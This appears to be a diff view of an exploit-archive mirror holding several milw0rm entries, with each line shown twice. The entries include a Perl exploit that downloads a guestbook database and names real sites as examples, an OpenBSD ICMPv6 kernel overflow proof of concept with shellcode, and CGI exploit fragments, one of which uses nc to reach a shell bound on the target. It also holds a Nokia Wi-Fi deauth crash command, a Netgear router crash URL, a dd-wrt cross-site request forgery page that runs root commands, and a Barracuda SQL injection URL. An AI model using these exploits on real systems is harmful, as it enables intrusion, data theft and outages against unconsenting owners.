@~~=http://site.com/ [PATH] /admin_dl_browse.asp @~~=http://site.com/ [PATH] /admin_dl_browse.asp
@~~=http://site.com/ [PATH] /dl_add_form.asp @~~=http://site.com/ [PATH] /dl_add_form.asp
@~~=Demo: @~~=Demo:
@~~=http://vegtrafikk.net/admin_dl_browse.asp @~~=http://vegtrafikk.net/admin_dl_browse.asp
@~~=http://resala2u.com/admin_dl_browse.asp @~~=http://resala2u.com/admin_dl_browse.asp
vs.. vs.. vs.. vs.. vs.. vs..
@~~=======================================~~@ @~~=======================================~~@
@~~=Greetz For @~~=Greetz For
@~~=Str0ke & Kralman & Mrabah12R & K3vin Mitnick & web-terrorist & Silent & SpotGang @~~=Str0ke & Kralman & Mrabah12R & K3vin Mitnick & web-terrorist & Silent & SpotGang
@~~=======================================~~@ @~~=======================================~~@
Derdimi dinledim, derdimden iGRENDiM... Derdimi dinledim, derdimden iGRENDiM...
Onun derdini gordum, derdime iMRENDiM... Onun derdini gordum, derdime iMRENDiM...
FilistiN FilistiN
@~~=======================================~~@ @~~=======================================~~@
# milw0rm.com [2009-02-27] # milw0rm.com [2009-02-27]

112
platforms/asp/webapps/8377.pl
View file

@ -1,56 +1,56 @@
#!/usr/bin/perl #!/usr/bin/perl
# By AlpHaNiX [NullArea.Net] # By AlpHaNiX [NullArea.Net]
# alpha[at]hacker.bz # alpha[at]hacker.bz
# Made in Tunisia # Made in Tunisia
########### ###########
# script : Exjune Guestbook v2 # script : Exjune Guestbook v2
# download : http://www.exjune.com/downloads/downloads/exJune_guestbook.asp # download : http://www.exjune.com/downloads/downloads/exJune_guestbook.asp
########### ###########
# Vulnerable : # Vulnerable :
# database path : /admin/exdb.mdb # database path : /admin/exdb.mdb
########## ##########
# Real Life Example : # Real Life Example :
# #
# #
# OOO OOO OO OO OO # OOO OOO OO OO OO
# OO O O O O # OO O O O O
# O O O OO OO O O O O OO OOO OOOO OOOOO # O O O OO OO O O O O OO OOO OOOO OOOOO
# O O O O O O O OOO OO OOOOOO O # O O O O O O O OOO OO OOOOOO O
# O OO O O O O O O O O OOOOOO # O OO O O O O O O O O OOOOOO
# OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO # OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO
# #
# #
#[-] Exjune Guestbook v2 Remote Database Disclosure Exploit #[-] Exjune Guestbook v2 Remote Database Disclosure Exploit
#[-] Found & Exploited By AlpHaNiX #[-] Found & Exploited By AlpHaNiX
# #
# #
#[!] Exploiting http://www.ladyslipperretreat.com/guestbook// .... #[!] Exploiting http://www.ladyslipperretreat.com/guestbook// ....
#[+] http://www.ladyslipperretreat.com/guestbook// Exploited ! Database saved to c:/db.mdb #[+] http://www.ladyslipperretreat.com/guestbook// Exploited ! Database saved to c:/db.mdb
########## ##########
# Greetz for Zigma/Djek/unary/r1z # Greetz for Zigma/Djek/unary/r1z
use lwp::UserAgent; use lwp::UserAgent;
system('cls'); system('cls');
system('title Exjune Guestbook v2 Remote Database Disclosure Exploit'); system('title Exjune Guestbook v2 Remote Database Disclosure Exploit');
system('color 2'); system('color 2');
if (!defined($ARGV[0])) {print "[!] Usage : \n ./exploit http://site.com\n";exit();} if (!defined($ARGV[0])) {print "[!] Usage : \n ./exploit http://site.com\n";exit();}
if ($ARGV[0] =~ /http:\/\// ) { $site = $ARGV[0]."/"; } else { $site = "http://".$ARGV[0]."/"; } if ($ARGV[0] =~ /http:\/\// ) { $site = $ARGV[0]."/"; } else { $site = "http://".$ARGV[0]."/"; }
print "\n\n\n\n OOO OOO OO OO OO\n" ; print "\n\n\n\n OOO OOO OO OO OO\n" ;
print " OO O O O O\n" ; print " OO O O O O\n" ;
print " O O O OO OO O O O O OO OOO OOOO OOOOO\n" ; print " O O O OO OO O O O O OO OOO OOOO OOOOO\n" ;
print " O O O O O O O OOO OO OOOOOO O\n" ; print " O O O O O O O OOO OO OOOOOO O\n" ;
print " O OO O O O O O O O O OOOOOO\n" ; print " O OO O O O O O O O O OOOOOO\n" ;
print " OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO\n" ; print " OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO\n" ;
print "\n\n[-] Exjune Guestbook v2 Remote Database Disclosure Exploit\n"; print "\n\n[-] Exjune Guestbook v2 Remote Database Disclosure Exploit\n";
print "[-] Found & Exploited By AlpHaNiX \n\n\n"; print "[-] Found & Exploited By AlpHaNiX \n\n\n";
print "[!] Exploiting $site ....\n"; print "[!] Exploiting $site ....\n";
my $site = $ARGV[0] ; my $site = $ARGV[0] ;
my $target = $site."/admin/exdb.mdb" ; my $target = $site."/admin/exdb.mdb" ;
my $useragent = LWP::UserAgent->new(); my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($target,":content_file" => "c:/db.mdb"); my $request = $useragent->get($target,":content_file" => "c:/db.mdb");
if ($request->is_success) {print "[+] $site Exploited ! Database saved to c:/db.mdb";exit();} if ($request->is_success) {print "[+] $site Exploited ! Database saved to c:/db.mdb";exit();}
else {print "[!] Exploiting $site Failed !\n[!] ".$request->status_line."\n";exit();} else {print "[!] Exploiting $site Failed !\n[!] ".$request->status_line."\n";exit();}
# milw0rm.com [2009-04-09] # milw0rm.com [2009-04-09]

332
platforms/bsd/remote/3491.py
View file

@ -1,166 +1,166 @@
# The PoC executes the shellcode (int 3) and returns. It overwrites the # The PoC executes the shellcode (int 3) and returns. It overwrites the
# ext_free() function pointer on the mbuf and forces a m_freem() on the # ext_free() function pointer on the mbuf and forces a m_freem() on the
# overflowed packet. # overflowed packet.
# #
# The Impacket library is used to craft and send packets # The Impacket library is used to craft and send packets
# (http://oss.coresecurity.com/projects/impacket.html or download from # (http://oss.coresecurity.com/projects/impacket.html or download from
# Debian repositories) # Debian repositories)
# #
# Currently, only systems supporting raw sockets and the PF_PACKET family # Currently, only systems supporting raw sockets and the PF_PACKET family
# can run the included proof-of-concept code. # can run the included proof-of-concept code.
# #
# Tested against a system running "OpenBSD 4.0 CURRENT (GENERIC) Mon Oct # Tested against a system running "OpenBSD 4.0 CURRENT (GENERIC) Mon Oct
# 30" # 30"
# #
# To use the code to test a custom machine you will need to: 1) Adjust the # To use the code to test a custom machine you will need to: 1) Adjust the
# MACADDRESS variable 2) Find the right trampoline value for your system # MACADDRESS variable 2) Find the right trampoline value for your system
# and replace it in the code. To find a proper trampoline value use the # and replace it in the code. To find a proper trampoline value use the
# following command: "objdump -d /bsd | grep esi | grep jmp" 3) Adjust the # following command: "objdump -d /bsd | grep esi | grep jmp" 3) Adjust the
# ICMP checksum # ICMP checksum
# #
# The exploit should stop on an int 3 and pressing "c" in ddb the kernel # The exploit should stop on an int 3 and pressing "c" in ddb the kernel
# will continue normally. # will continue normally.
# #
# #
# Description: # Description:
# OpenBSD ICMPv6 fragment remote execution PoC # OpenBSD ICMPv6 fragment remote execution PoC
# #
# Author: # Author:
# Alfredo Ortega # Alfredo Ortega
# Mario Vilas # Mario Vilas
# #
# Copyright (c) 2001-2007 CORE Security Technologies, CORE SDI Inc. # Copyright (c) 2001-2007 CORE Security Technologies, CORE SDI Inc.
# All rights reserved # All rights reserved
from impacket import ImpactPacket from impacket import ImpactPacket
import struct import struct
import socket import socket
import time import time
class BSD_ICMPv6_Remote_BO: class BSD_ICMPv6_Remote_BO:
MACADDRESS = (0x00,0x0c,0x29,0x44,0x68,0x6f) MACADDRESS = (0x00,0x0c,0x29,0x44,0x68,0x6f)
def Run(self): def Run(self):
self.s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW) self.s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
self.s.bind(('eth0',0x86dd)) self.s.bind(('eth0',0x86dd))
sourceIP = '\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0f\x29\xff\xfe\x44\x68\x6f' # source address sourceIP = '\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x0f\x29\xff\xfe\x44\x68\x6f' # source address
destIP = '\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' # destination address Multicast Link-level destIP = '\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01' # destination address Multicast Link-level
firstFragment, secondFragment = self.buildOpenBSDPackets(sourceIP,destIP) firstFragment, secondFragment = self.buildOpenBSDPackets(sourceIP,destIP)
validIcmp = self.buildValidICMPPacket(sourceIP,destIP) validIcmp = self.buildValidICMPPacket(sourceIP,destIP)
for i in range(100): # fill mbufs for i in range(100): # fill mbufs
self.sendpacket(firstFragment) self.sendpacket(firstFragment)
self.sendpacket(validIcmp) self.sendpacket(validIcmp)
time.sleep(0.01) time.sleep(0.01)
for i in range(2): # Number of overflow packets to send. Increase if exploit is not reliable for i in range(2): # Number of overflow packets to send. Increase if exploit is not reliable
self.sendpacket(secondFragment) self.sendpacket(secondFragment)
time.sleep(0.1) time.sleep(0.1)
self.sendpacket(firstFragment) self.sendpacket(firstFragment)
self.sendpacket(validIcmp) self.sendpacket(validIcmp)
time.sleep(0.1) time.sleep(0.1)
def sendpacket(self, data): def sendpacket(self, data):
ipe = ImpactPacket.Ethernet() ipe = ImpactPacket.Ethernet()
ipe.set_ether_dhost(self.MACADDRESS) ipe.set_ether_dhost(self.MACADDRESS)
ipd = ImpactPacket.Data(data) ipd = ImpactPacket.Data(data)
ipd.ethertype = 0x86dd # Ethertype for IPv6 ipd.ethertype = 0x86dd # Ethertype for IPv6
ipe.contains(ipd) ipe.contains(ipd)
p = ipe.get_packet() p = ipe.get_packet()
self.s.send(p) self.s.send(p)
def buildOpenBSDPackets(self,sourceIP,destIP): def buildOpenBSDPackets(self,sourceIP,destIP):
HopByHopLenght= 1 HopByHopLenght= 1
IPv6FragmentationHeader = '' IPv6FragmentationHeader = ''
IPv6FragmentationHeader += struct.pack('!B', 0x3a) # next header (00: Hop by Hop) IPv6FragmentationHeader += struct.pack('!B', 0x3a) # next header (00: Hop by Hop)
IPv6FragmentationHeader += struct.pack('!B', 0x00) # reserverd IPv6FragmentationHeader += struct.pack('!B', 0x00) # reserverd
IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset
IPv6FragmentationHeader += struct.pack('!B', 0x01) # offset + More fragments: yes IPv6FragmentationHeader += struct.pack('!B', 0x01) # offset + More fragments: yes
IPv6FragmentationHeader += struct.pack('>L', 0x0EADBABE) # id IPv6FragmentationHeader += struct.pack('>L', 0x0EADBABE) # id
IPv6HopByHopHeader = '' IPv6HopByHopHeader = ''
IPv6HopByHopHeader += struct.pack('!B', 0x2c) # next header (0x3A: ICMP) IPv6HopByHopHeader += struct.pack('!B', 0x2c) # next header (0x3A: ICMP)
IPv6HopByHopHeader += struct.pack('!B', HopByHopLenght ) # Hdr Ext Len (frutaaaaaaa :D ) IPv6HopByHopHeader += struct.pack('!B', HopByHopLenght ) # Hdr Ext Len (frutaaaaaaa :D )
IPv6HopByHopHeader += '\x00' *(((HopByHopLenght+1)*8)-2) # Options IPv6HopByHopHeader += '\x00' *(((HopByHopLenght+1)*8)-2) # Options
longitud = len(IPv6HopByHopHeader)+len(IPv6FragmentationHeader) longitud = len(IPv6HopByHopHeader)+len(IPv6FragmentationHeader)
print longitud print longitud
IPv6Packet = '' IPv6Packet = ''
IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label
IPv6Packet += struct.pack( '>H', longitud ) # payload length IPv6Packet += struct.pack( '>H', longitud ) # payload length
IPv6Packet += '\x00' # next header (2c: Fragmentation) IPv6Packet += '\x00' # next header (2c: Fragmentation)
IPv6Packet += '\x40' # hop limit IPv6Packet += '\x40' # hop limit
IPv6Packet += sourceIP IPv6Packet += sourceIP
IPv6Packet += destIP IPv6Packet += destIP
firstFragment = IPv6Packet+IPv6HopByHopHeader+IPv6FragmentationHeader+('O'*150) firstFragment = IPv6Packet+IPv6HopByHopHeader+IPv6FragmentationHeader+('O'*150)
self.ShellCode = '' self.ShellCode = ''
self.ShellCode += '\xcc' # int 3 self.ShellCode += '\xcc' # int 3
self.ShellCode += '\x83\xc4\x20\x5b\x5e\x5f\xc9\xc3\xcc' #fix ESP and ret self.ShellCode += '\x83\xc4\x20\x5b\x5e\x5f\xc9\xc3\xcc' #fix ESP and ret
ICMPv6Packet = '' ICMPv6Packet = ''
ICMPv6Packet += '\x80' # type (128 == Icmp echo request) ICMPv6Packet += '\x80' # type (128 == Icmp echo request)
ICMPv6Packet += '\x00' # code ICMPv6Packet += '\x00' # code
ICMPv6Packet += '\xfb\x4e' # checksum ICMPv6Packet += '\xfb\x4e' # checksum
ICMPv6Packet += '\x33\xf6' # ID ICMPv6Packet += '\x33\xf6' # ID
ICMPv6Packet += '\x00\x00' # sequence ICMPv6Packet += '\x00\x00' # sequence
ICMPv6Packet += ('\x90'*(212-len(self.ShellCode)))+self.ShellCode ICMPv6Packet += ('\x90'*(212-len(self.ShellCode)))+self.ShellCode
# Start of the next mfub (we land here): # Start of the next mfub (we land here):
ICMPv6Packet += '\x90\x90\x90\x90\xE9\x3B\xFF\xFF' # jump backwards ICMPv6Packet += '\x90\x90\x90\x90\xE9\x3B\xFF\xFF' # jump backwards
ICMPv6Packet += '\xFFAAA\x01\x01\x01\x01AAAABBBBAAAABBBB' ICMPv6Packet += '\xFFAAA\x01\x01\x01\x01AAAABBBBAAAABBBB'
# mbuf+0x20: # mbuf+0x20:
trampoline = '\x8c\x23\x20\xd0' # jmp ESI on /bsd (find with "objdump -d /bsd | grep esi | grep jmp") trampoline = '\x8c\x23\x20\xd0' # jmp ESI on /bsd (find with "objdump -d /bsd | grep esi | grep jmp")
ICMPv6Packet += 'AAAAAAAA'+trampoline+'CCCCDDDDEEEEFFFFGGGG' ICMPv6Packet += 'AAAAAAAA'+trampoline+'CCCCDDDDEEEEFFFFGGGG'
longitud = len(ICMPv6Packet) longitud = len(ICMPv6Packet)
IPv6Packet = '' IPv6Packet = ''
IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label
IPv6Packet += struct.pack( '>H', longitud ) # payload length IPv6Packet += struct.pack( '>H', longitud ) # payload length
IPv6Packet += '\x2c' # next header (2c: Fragmentation) IPv6Packet += '\x2c' # next header (2c: Fragmentation)
IPv6Packet += '\x40' # hop limit IPv6Packet += '\x40' # hop limit
IPv6Packet += sourceIP IPv6Packet += sourceIP
IPv6Packet += destIP IPv6Packet += destIP
IPv6FragmentationHeader = '' IPv6FragmentationHeader = ''
IPv6FragmentationHeader += struct.pack('!B', 0x3a) # next header (3A: icmpV6) IPv6FragmentationHeader += struct.pack('!B', 0x3a) # next header (3A: icmpV6)
IPv6FragmentationHeader += struct.pack('!B', 0x00) # reserverd IPv6FragmentationHeader += struct.pack('!B', 0x00) # reserverd
IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset
IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset + More fragments:no IPv6FragmentationHeader += struct.pack('!B', 0x00) # offset + More fragments:no
IPv6FragmentationHeader += struct.pack('>L', 0x0EADBABE) # id IPv6FragmentationHeader += struct.pack('>L', 0x0EADBABE) # id
secondFragment = IPv6Packet+IPv6FragmentationHeader+ICMPv6Packet secondFragment = IPv6Packet+IPv6FragmentationHeader+ICMPv6Packet
return firstFragment, secondFragment return firstFragment, secondFragment
def buildValidICMPPacket(self,sourceIP,destIP): def buildValidICMPPacket(self,sourceIP,destIP):
ICMPv6Packet = '' ICMPv6Packet = ''
ICMPv6Packet += '\x80' # type (128 == Icmp echo request) ICMPv6Packet += '\x80' # type (128 == Icmp echo request)
ICMPv6Packet += '\x00' # code ICMPv6Packet += '\x00' # code
ICMPv6Packet += '\xcb\xc4' # checksum ICMPv6Packet += '\xcb\xc4' # checksum
ICMPv6Packet += '\x33\xf6' # ID ICMPv6Packet += '\x33\xf6' # ID
ICMPv6Packet += '\x00\x00' # sequence ICMPv6Packet += '\x00\x00' # sequence
ICMPv6Packet += 'T'*1232 ICMPv6Packet += 'T'*1232
longitud = len(ICMPv6Packet) longitud = len(ICMPv6Packet)
IPv6Packet = '' IPv6Packet = ''
IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label IPv6Packet += struct.pack( '>L', 6 << 28 ) # version, traffic class, flow label
IPv6Packet += struct.pack( '>H', longitud ) # payload length IPv6Packet += struct.pack( '>H', longitud ) # payload length
IPv6Packet += '\x3A' # next header (2c: Fragmentation) IPv6Packet += '\x3A' # next header (2c: Fragmentation)
IPv6Packet += '\x40' # hop limit IPv6Packet += '\x40' # hop limit
IPv6Packet += sourceIP IPv6Packet += sourceIP
IPv6Packet += destIP IPv6Packet += destIP
icmpPacket = IPv6Packet+ICMPv6Packet icmpPacket = IPv6Packet+ICMPv6Packet
return icmpPacket return icmpPacket
attack = BSD_ICMPv6_Remote_BO() attack = BSD_ICMPv6_Remote_BO()
attack.Run() attack.Run()
# milw0rm.com [2007-03-15] # milw0rm.com [2007-03-15]

6
platforms/cgi/webapps/177.pl
View file

@ -187,6 +187,6 @@ sub sendraw {
} else { } else {
die("can\'t connect... aborting.\n"); die("can\'t connect... aborting.\n");
} }
} }
# milw0rm.com [2000-11-15] # milw0rm.com [2000-11-15]

6
platforms/cgi/webapps/187.pl
View file

@ -66,6 +66,6 @@ close(SOCKET);
print("\nSleeping 5 seconds - waiting for the shell ...\n\n"); print("\nSleeping 5 seconds - waiting for the shell ...\n\n");
sleep(5); system("nc -w 10 $target 60179"); exit(0); sleep(5); system("nc -w 10 $target 60179"); exit(0);
# milw0rm.com [2000-11-17] # milw0rm.com [2000-11-17]

6
platforms/cgi/webapps/922.pl
View file

@ -62,6 +62,6 @@ while ($ans = <$s>)
if ($flag == 1) { print " $ans"; } if ($flag == 1) { print " $ans"; }
if ($ans =~ /^_N_/) { print " ===[ Executed command $cmd ]===============================\n"; $flag = 1 } if ($ans =~ /^_N_/) { print " ===[ Executed command $cmd ]===============================\n"; $flag = 1 }
} }
# milw0rm.com [2005-04-08] # milw0rm.com [2005-04-08]

6
platforms/cgi/webapps/923.pl
View file

@ -82,6 +82,6 @@ while (<$socket>)
print $_; print $_;
exit; exit;
} }
} }
# milw0rm.com [2005-04-08] # milw0rm.com [2005-04-08]

1000
platforms/generator/shellcode/13289.c
View file

File diff suppressed because it is too large Load diff

58
platforms/hardware/dos/6459.txt
View file

@ -1,29 +1,29 @@
Nokia E90 and probably other devices with s60v3 crashes with aireplay Nokia E90 and probably other devices with s60v3 crashes with aireplay
The device should be authorised on an access point The device should be authorised on an access point
sample: aireplay-ng -0 10 -a 00:74:3B:0C:A0:5A -c 00:2A:29:F3:1F:42 wlan0 sample: aireplay-ng -0 10 -a 00:74:3B:0C:A0:5A -c 00:2A:29:F3:1F:42 wlan0
My HW: My HW:
AP= Acorp w422g AP= Acorp w422g
Nokia E90 v 07.40.1.2 Ra-6 Nokia E90 v 07.40.1.2 Ra-6
For attack realisation is necessary to send DeAuth a package on the attacked For attack realisation is necessary to send DeAuth a package on the attacked
device (to throw out it from an access point), then to continue to send device (to throw out it from an access point), then to continue to send
packages on the device. packages on the device.
the Device is crashed off right after repeated authorisation on an access the Device is crashed off right after repeated authorisation on an access
point point
Vulnerability is fast shown at activity on WLAN Vulnerability is fast shown at activity on WLAN
WLAN Settings: auto WLAN Settings: auto
I specify a harmful code: ./aireplay-ng -x 1024 -0 230 -a $ap -c $target I specify a harmful code: ./aireplay-ng -x 1024 -0 230 -a $ap -c $target
$iface $iface
Added: the vulnerable device: Nokia N82 Added: the vulnerable device: Nokia N82
# milw0rm.com [2008-09-14] # milw0rm.com [2008-09-14]

34
platforms/hardware/dos/8106.txt
View file

@ -1,17 +1,17 @@
LUNOSEC ADVISORY LUNOSEC ADVISORY
Synopsis: Denial of Service condition in Netgear's WGR614v9 Wireless Router Synopsis: Denial of Service condition in Netgear's WGR614v9 Wireless Router
Firmware version tested: v1.2.2_14.0.13NA (LATEST) Firmware version tested: v1.2.2_14.0.13NA (LATEST)
Firmware version tested: WNR834Bv2 v2.0.8_2.0.8 # GTADarkDude tested Firmware version tested: WNR834Bv2 v2.0.8_2.0.8 # GTADarkDude tested
Proof of Concept: Proof of Concept:
Appending a question mark to the router's internal IP address after Appending a question mark to the router's internal IP address after
the forward slash. e.g., http://192.168.1.1/? results in a denial of the forward slash. e.g., http://192.168.1.1/? results in a denial of
service condition where the http server dies and the administrative service condition where the http server dies and the administrative
interface is no longer available until after a device reboot. interface is no longer available until after a device reboot.
found: fabrizio siciliano (staticrez) found: fabrizio siciliano (staticrez)
# milw0rm.com [2009-02-25] # milw0rm.com [2009-02-25]

186
platforms/hardware/remote/7389.htm
View file

@ -1,93 +1,93 @@
Remote root dd-wrt Remote root dd-wrt
-------------------------------------------------------------------------------- --------------------------------------------------------------------------------
Written by Michael Brooks Written by Michael Brooks
Special thanks to str0ke Special thanks to str0ke
Exploits tested on the newist stable version: Exploits tested on the newist stable version:
Firmware: DD-WRT v24-sp1 (07/27/08) micro Firmware: DD-WRT v24-sp1 (07/27/08) micro
Product Homepage: Product Homepage:
http://dd-wrt.com/ http://dd-wrt.com/
Impact: Impact:
1)Remote root command execuiton /bin/sh 1)Remote root command execuiton /bin/sh
2)Change web administration password and enable remote admistration 2)Change web administration password and enable remote admistration
3)create new Port Forwarding rules to byass NAT. 3)create new Port Forwarding rules to byass NAT.
<html> <html>
<head> <head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"> <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
</head> </head>
Remote root command execution /bin/sh Remote root command execution /bin/sh
<form method="post" action="http://192.168.1.1/apply.cgi" id=1> <form method="post" action="http://192.168.1.1/apply.cgi" id=1>
<input name="submit_button" value="Ping" type="hidden"> <input name="submit_button" value="Ping" type="hidden">
<input name="action" value="ApplyTake" type="hidden"> <input name="action" value="ApplyTake" type="hidden">
<input name="submit_type" value="start" type="hidden"> <input name="submit_type" value="start" type="hidden">
<input name="change_action" value="gozila_cgi" type="hidden"> <input name="change_action" value="gozila_cgi" type="hidden">
<input name="next_page" value="Diagnostics.asp" type="hidden"> <input name="next_page" value="Diagnostics.asp" type="hidden">
<input name="ping_ip" value="echo owned"> <input name="ping_ip" value="echo owned">
<input name="execute command" type="submit"> <input name="execute command" type="submit">
</form><br><br> </form><br><br>
enable remote administration and change login to root:password enable remote administration and change login to root:password
<form method="post" action="http://192.168.1.1/apply.cgi"> <form method="post" action="http://192.168.1.1/apply.cgi">
<input name="submit_button" value="Management" type="hidden"> <input name="submit_button" value="Management" type="hidden">
<input name="action" value="ApplyTake" type="hidden"> <input name="action" value="ApplyTake" type="hidden">
<input name="change_action" value="" type="hidden"> <input name="change_action" value="" type="hidden">
<input name="submit_type" value="" type="hidden"> <input name="submit_type" value="" type="hidden">
<input name="commit" value="1" type="hidden"> <input name="commit" value="1" type="hidden">
<input name="PasswdModify" value="0" type="hidden"> <input name="PasswdModify" value="0" type="hidden">
<input name="remote_mgt_https" value="" type="hidden"> <input name="remote_mgt_https" value="" type="hidden">
<input name="http_enable" value="1" type="hidden"> <input name="http_enable" value="1" type="hidden">
<input name="info_passwd" value="0" type="hidden"> <input name="info_passwd" value="0" type="hidden">
<input name="https_enable" value="" type="hidden"> <input name="https_enable" value="" type="hidden">
<input name="http_username" value="root" type="hidden"> <input name="http_username" value="root" type="hidden">
<input name="http_passwd" value="password" type="hidden"> <input name="http_passwd" value="password" type="hidden">
<input name="http_passwdConfirm" value="password" type="hidden"> <input name="http_passwdConfirm" value="password" type="hidden">
<input name="_http_enable" value="1" type="hidden"> <input name="_http_enable" value="1" type="hidden">
<input name="refresh_time" value="3" type="hidden"> <input name="refresh_time" value="3" type="hidden">
<input name="status_auth" value="1" type="hidden"> <input name="status_auth" value="1" type="hidden">
<input name="maskmac" value="1" type="hidden"> <input name="maskmac" value="1" type="hidden">
<input name="remote_management" value="1" type="hidden"> <input name="remote_management" value="1" type="hidden">
<input name="http_wanport" value="8080" type="hidden"> <input name="http_wanport" value="8080" type="hidden">
<input name="remote_mgt_telnet" value="1" type="hidden"> <input name="remote_mgt_telnet" value="1" type="hidden">
<input name="telnet_wanport" value="23" type="hidden"> <input name="telnet_wanport" value="23" type="hidden">
<input name="boot_wait" value="on" type="hidden"> <input name="boot_wait" value="on" type="hidden">
<input name="cron_enable" value="1" type="hidden"> <input name="cron_enable" value="1" type="hidden">
<input name="cron_jobs" value="" type="hidden"> <input name="cron_jobs" value="" type="hidden">
<input name="loopback_enable" value="1" type="hidden"> <input name="loopback_enable" value="1" type="hidden">
<input name="nas_enable" value="1" type="hidden"> <input name="nas_enable" value="1" type="hidden">
<input name="resetbutton_enable" value="1" type="hidden"> <input name="resetbutton_enable" value="1" type="hidden">
<input name="zebra_enable" value="1" type="hidden"> <input name="zebra_enable" value="1" type="hidden">
<input name="ip_conntrack_max" value="512" type="hidden"> <input name="ip_conntrack_max" value="512" type="hidden">
<input name="ip_conntrack_tcp_timeouts" value="3600" type="hidden"> <input name="ip_conntrack_tcp_timeouts" value="3600" type="hidden">
<input name="ip_conntrack_udp_timeouts" value="120" type="hidden"> <input name="ip_conntrack_udp_timeouts" value="120" type="hidden">
<input name="overclocking" value="200" type="hidden"> <input name="overclocking" value="200" type="hidden">
<input name="router_style" value="yellow" type="hidden"> <input name="router_style" value="yellow" type="hidden">
<input name="Remote Admin" type="submit"> <input name="Remote Admin" type="submit">
</form><br><br> </form><br><br>
Change Port Forwarding to byass NAT protection. Change Port Forwarding to byass NAT protection.
<form method="post" action="http://192.168.1.1/apply.cgi"> <form method="post" action="http://192.168.1.1/apply.cgi">
<input name="submit_button" value="Change Port Forwarding" type="submit"> <input name="submit_button" value="Change Port Forwarding" type="submit">
<input name="action" value="ApplyTake" type="hidden"> <input name="action" value="ApplyTake" type="hidden">
<input name="change_action" value="" type="hidden"> <input name="change_action" value="" type="hidden">
<input name="submit_type" value="" type="hidden"> <input name="submit_type" value="" type="hidden">
<input name="forward_spec" value="13" type="hidden"> <input name="forward_spec" value="13" type="hidden">
<input name="name0" value="Hacked" type="hidden"> <input name="name0" value="Hacked" type="hidden">
<input name="from0" value="4450" type="hidden"> <input name="from0" value="4450" type="hidden">
<input name="pro0" value="both" type="hidden"> <input name="pro0" value="both" type="hidden">
<input name="ip0" value="192.168.1.100" type="hidden"> <input name="ip0" value="192.168.1.100" type="hidden">
<input name="to0" value="445" type="hidden"> <input name="to0" value="445" type="hidden">
<input name="enable0" value="on" type="hidden"> <input name="enable0" value="on" type="hidden">
<input name="name1" value="Hacked Again" type="hidden"> <input name="name1" value="Hacked Again" type="hidden">
<input name="from1" value="22" type="hidden"> <input name="from1" value="22" type="hidden">
<input name="pro1" value="tcp" type="hidden"> <input name="pro1" value="tcp" type="hidden">
<input name="ip1" value="192.168.1.101" type="hidden"> <input name="ip1" value="192.168.1.101" type="hidden">
<input name="to1" value="22" type="hidden"> <input name="to1" value="22" type="hidden">
<input name="enable1" value="on" type="hidden"> <input name="enable1" value="on" type="hidden">
</form> </form>
</html> </html>
<script> <script>
document.getElementById(1).submit();//remote root command execution! document.getElementById(1).submit();//remote root command execution!
</script> </script>
# milw0rm.com [2008-12-08] # milw0rm.com [2008-12-08]

136
platforms/hardware/remote/7496.txt
View file

@ -1,68 +1,68 @@
CVE Number: CVE-2008-1094 CVE Number: CVE-2008-1094
Vulnerability: SQL Injection Vulnerability: SQL Injection
Risk: Medium Risk: Medium
Attack vector: From Remote Attack vector: From Remote
Vulnerability Discovered: 16th June 2008 Vulnerability Discovered: 16th June 2008
Vendor Notified: 16th June 2008 Vendor Notified: 16th June 2008
Advisory Released: 15th December 2008 Advisory Released: 15th December 2008
Abstract Abstract
Barracuda Networks Spam Firewall is vulnerable to various SQL Injection attacks. Barracuda Networks Spam Firewall is vulnerable to various SQL Injection attacks.
When exploited by an authenticated user, the identified vulnerability can lead to When exploited by an authenticated user, the identified vulnerability can lead to
Denial of Service, Database Information Disclosure, etc. Denial of Service, Database Information Disclosure, etc.
Description Description
The index.cgi resource was identified as being susceptible to SQL Injection attacks. The index.cgi resource was identified as being susceptible to SQL Injection attacks.
When filtering user accounts in Users->Account View section, the pattern_x parameter When filtering user accounts in Users->Account View section, the pattern_x parameter
(where x = 0..n) allows inserting arbitrary SQL code once filter_x parameter is set (where x = 0..n) allows inserting arbitrary SQL code once filter_x parameter is set
to search_count_equals value. to search_count_equals value.
/cgi-bin/index.cgi?&user=&password=&et=&auth_type=Local&locale=en_US&realm=&primary_tab=USERS&secondary_tab=per_user_account_view&boolean_0=boolean_and&filter_0=search_count_equals&pattern_0=if(database() like concat(char(99),char(37)),5,0) /cgi-bin/index.cgi?&user=&password=&et=&auth_type=Local&locale=en_US&realm=&primary_tab=USERS&secondary_tab=per_user_account_view&boolean_0=boolean_and&filter_0=search_count_equals&pattern_0=if(database() like concat(char(99),char(37)),5,0)
An attacker can exploit this vulnerability by injecting arbitrary SQL code to be An attacker can exploit this vulnerability by injecting arbitrary SQL code to be
executed as part of the SQL query. executed as part of the SQL query.
Original Advisory: Original Advisory:
http://dcsl.ul.ie/advisories/02.htm http://dcsl.ul.ie/advisories/02.htm
Barracuda Networks Technical Alert Barracuda Networks Technical Alert
http://www.barracudanetworks.com/ns/support/tech_alert.php http://www.barracudanetworks.com/ns/support/tech_alert.php
Affected Versions Affected Versions
Barracuda Spam Firewall (Firmware v3.5.11.020, Model 600) Barracuda Spam Firewall (Firmware v3.5.11.020, Model 600)
